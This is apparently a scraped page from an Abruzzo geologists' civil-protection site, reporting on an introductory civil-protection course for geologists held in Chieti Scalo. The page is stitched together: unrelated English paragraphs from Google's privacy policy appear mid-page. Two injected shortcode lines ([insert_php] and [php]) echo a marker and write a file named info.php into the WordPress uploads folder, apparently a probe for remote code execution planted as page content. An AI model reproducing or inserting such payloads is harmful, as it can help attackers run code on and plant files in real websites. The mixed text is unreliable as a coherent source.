• +39 3932205894
  • geologiambiente@gmail.com; deangelisdaniela@hotmail.it

Archivio dei tag protezione civile

Crollo nel comune di Fossa (AQ)

Presidi territoriali di Protezione Civile

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/insert_php]
[php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/php]

Foto dell'alluvione del fiume Pescara a cura di Carlo Senatore

Corso introduttivo alle tematiche di protezione civile.

La sala convegni dell’hotel Parco Paglia a Chieti Scalo è stato nuovamente sede di un evento organizzato dall’Ordine dei Geologi della regione Abruzzo. Il 7 marzo si è tenuto il Corso introduttivo alle tematiche di protezione civile, per i geologi dell’Abruzzo e del Molise. Questo corso introduce in un percorso di formazione, che ha come finalità quella di formare i nuovi volontari che andranno a fornire nei momenti di emergenza idrica, idrogeologica e sismica un supporto tecnico specifico.
I relatori che si sono susseguiti nella prima parte della giornata hanno approfondito tutti gli aspetti preliminari della struttura della Protezione Civile nazionale e Regionale
L’Ing. Silvio Liberatore, del Servizio Emergenza di Protezione Civile della Regione Abruzzo, ha raccontato l’esperienza del servizio prestato a seguito del terremoto de L’Aquila del 2009 e di come le problematiche che si sono presentate hanno aiutato a modificare la progettazione del servizio emergenza sisma a livello nazionale. Il Dott. For. Sabatino Belmaggio, del Servizio Emergenza di Protezione Civile della Regione Abruzzo, ha parlato in particolare della gestione del post emergenza e dell’organizzazione del servizio, dei campi e delle problematiche riscontrate in fase di gestione.
L’ultimo degli interventi della mattinata è stato tenuto dall’Ing. Maria Basi ha parlato degli studi di Microzonazione Sismica. Questi studi si occupano di redigere una carta che sintetizzi approfonditi, per ogni singolo comune, gli effetti che un possibile sisma possa aver in termini di danni al patrimonio ed alla popolazione. Sono studi di prevenzione sismica previsti sia nella normativa nazionale che nella Regione Abruzzo. Si stanno redigendo ad opera dei geologi professionisti locali e a breve ricopriranno tutto il territorio abruzzese.
Gli interventi del pomeriggio si sono aperti con l’intervento del professor Paolo Boncio , che ha parlato dei fenomeni cosismici, portando degli esempi e dando dei consigli per inserirli nelle carte di microzonazione sismica. A seguire la Dott.ssa Alessandra Santacasa, del Centro Funzionale d’Abruzzo della Protezione Civile, ha spiegato cos’è e come funziona il sistema di allertamento nazionale e regionale, in caso accada un evento straordinario di tipo meteorologico, sismico, idrogeologico, idraulico o un incendio boschivo.
Per concludere l’’Ing. Raffaella Molinari ed il dott. Andrea Cipollone, del Centro Funzionale d’Abruzzo della Protezione Civile, hanno piegato cosa sono i piani di protezione civile dei comuni abruzzesi.
Il corso ha destato molto interesse ed un grande afflusso di tecnici che si stanno mettendo in gioco in questa attività di servizio e volontariato, del quale il nostro territorio ha sempre più bisogno.
La volontà dell’ordine è quella di istituire un’associazione di protezione civile, emanata dall’ordine, che sia preparata e formata e che riesca a fornire un valido aiuto in caso di necessità.
A questo corso ne seguirà un altro più specifico sulle procedure da tenere in caso di evento calamitoso, un’esercitazione in campo ed un esame finale.
Questo percorso è solo uno dei tanti che l’ordine dei geologi della Regione Abruzzo sta mettendo in atto per aiutare i professionisti a specializzarsi sempre di più per essere un valido supporto sia nel mondo del lavoro che in caso di eventi eccezionali.